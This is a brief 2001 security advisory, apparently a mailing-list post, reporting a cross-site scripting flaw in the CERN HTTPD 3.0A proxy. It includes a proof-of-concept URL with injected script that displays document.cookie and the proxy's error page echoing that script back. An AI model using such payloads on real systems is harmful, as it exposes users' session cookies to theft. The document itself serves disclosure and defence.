CERN Proxy Server: Cross-Site Scripting Vulnerability ===================================================== Affected: CERN HTTPD 3.0A http://www.w3.org/Daemon/Activity.html Vendor Status: CERN httpd team (httpd@w3.org) was notified on Aug 10, 2001 but they did not respond. Exploit: http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT> ======================================================== <HTML> <HEAD> <TITLE>Error Message</TITLE> </HEAD> <BODY> <H1>Fatal Error 500</H1> Can't Access Document: http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>. <P> <B>Reason:</B> Can't locate remote host: nonexistenthost.google.com. <P> ...snip... ======================================================== Similar problems have been found in Proxomitron Naoko-4 BetaFour, Microsoft ISA Server and Squid 2.4 DEVEL4. <http://www.securityfocus.com/bid/3087> <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp> <http://www.securityfocus.com/archive/1/197606> Best regards, -- Hiromitsu Takagi http://staff.aist.go.jp/takagi.hiromitsu/